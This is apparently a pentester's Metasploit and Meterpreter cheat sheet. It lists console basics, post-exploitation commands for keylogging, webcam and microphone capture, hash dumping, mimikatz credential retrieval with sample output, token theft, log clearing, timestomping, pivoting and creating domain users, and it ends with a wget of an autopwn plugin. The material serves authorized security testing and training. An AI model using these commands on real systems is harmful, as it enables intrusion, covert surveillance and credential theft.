Metasploit

Meterpreter Shell¶

Run in a Docker:

docker run --rm -it metasploitframework/metasploit-framework ./msfconsole
docker run --rm -it -v "${HOME}/.msf:/home/msf/.msf4" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole

Using a bash function:

function msfconsole {
    echo "Shared storage at ${HOME}/.msf"
    if [ -z "$1" ]
    then
        echo "forwarding 4444 -> 4444" 
        docker run --rm -it -v "${HOME}/.msf:/home/msf/" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
    else
        echo "forwarding $1 -> $1" 
        docker run --rm -it -v "${HOME}/.msf:/home/msf/" -p $1:$1 metasploitframework/metasploit-framework ./msfconsole
    fi
}

alias msfvenom='echo remember to save to -o /data/something ; docker run --rm -it -v "${HOME}/.msf:/home/msf/" -v "${PWD}:/data" metasploitframework/metasploit-framework ./msfvenom'

Metasploit Console Basics¶

Search for module:
msf > search [regex]

Specify and exploit to use:
msf > use exploit/[ExploitPath]

Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

Set options:
msf > set [Option] [Value]

Start exploit:
msf > exploit

Metasploit shell upgrade:

sessions -u

System Commands¶

    cd            Change directory
    lcd           Change directory on local (attacker's) machine
    clearev       Clear the event log
    download      Move files to the target machine
    drop_token    Relinquishes any active impersonation token.
    edit          Open a file in the default editor (typically vi)
    execute       Execute a command with the privileges of the process the Meterpreter is loaded in
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier that Meterpreter is running inside
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that that Meterpreter is running with
    kill          Terminate a process
    ps            List running processes
    migrate       Jump to a given destination process ID
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS
    upload        Move files from the target machine
    timestomp     Alter NTFS file timestamps

Incognito Commands¶

    meterpreter > load incognito

    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

    meterpreter > use incognito
    meterpreter > list_tokens -u
    meterpreter > impersonate_token DOMAIN\User

    meterpreter > add_user newuser password -h 192.168.20.30   #Attempt to create user on Domain Controller

User interface Commands¶

    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds that the GUI of the target machine has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          \[enable/disable\] \[keyboard/mouse\]: Enable/disable either the mouse or keyboard of the target machine

Webcam Commands¶

    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
    screengrab    Attempt to grab screen shot from process's active desktop

Elevate Commands¶

    meterpreter > use priv
    meterpreter > getsystem
    meterpreter > getuid

    getsystem     Attempt to elevate your privilege to that of local system.

Password database Commands¶

    hashdump      Dumps the contents of the SAM database

Mimikatz Commands¶

    meterpreter > load mimikatz

    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom commannd
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

Sniffer Commands¶

    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

Lanattacks¶

    dhcp_load_options  Load DHCP optionis from a datastore
    dhcp_log           Log DHCP server activity
    dhcp_reset         Reset the DHCP server
    dhcp_set_option    Set a DHCP server option
    dhcp_start         Start the DHCP server
    dhcp_stop          Stop the DHCP server

    tftp_add_file  Add a file to the TFTP server
    tftp_reset     Reset the TFTP server
    tftp_start     Start the TFTP server
    tftp_stop      Stop the TFTP server

Pivoting¶

Use Meterpreter Session to Pivot onto other Systems

meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]run

    ipconfig    Show network interface information
    portfwd     Forward packets through TCP session
    route       Manage/view the system's routing table

Useful Auxiliary Modules¶

Port Scanner:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server

msf > use auxiliary/server/socks4
msf > run

Managing Sessions¶

Exploit and background Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j

List all current jobs (usually exploit listeners):
msf > jobs –l

Kill a job:
msf > jobs –k [JobID]

Managing Multable Sessions¶

List all backgrounded sessions:
msf > sessions -l

Interact with a backgrounded session:
msf > session -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]

Post Exploitation¶

Migrating processes¶

Migrate metasploit to another process:

meterpreter > migrate 1450

Privlage Esclation¶

Load extensions:

meterpreter > load mimikatz
meterpreter > load incognito

Privilege Escalation:

meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid

Token Impersonation:
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User

Steal Token:

meterpreter > steal_token [user PID]

Attempt to retrieve Kerberos or Livessp credentials:

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)

meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)

meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============

AuthID  Package  Domain  User  Password
------  -------  ------  ----  --------

meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)

meterpreter >

Pivot into internal network¶

Attempt to create user on Domain Controller:

meterpreter > add_user newuser password -h 192.168.20.30

Pivot to other systems in the local network:

meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]run

Autopwn¶

Download the Autopwn module:

cd /opt/metasploit/apps/pro/msf3/plugins/
wget 'https://raw.github.com/neinwechter/metasploit-framework/autopwn-modules/plugins/db_autopwn.rb'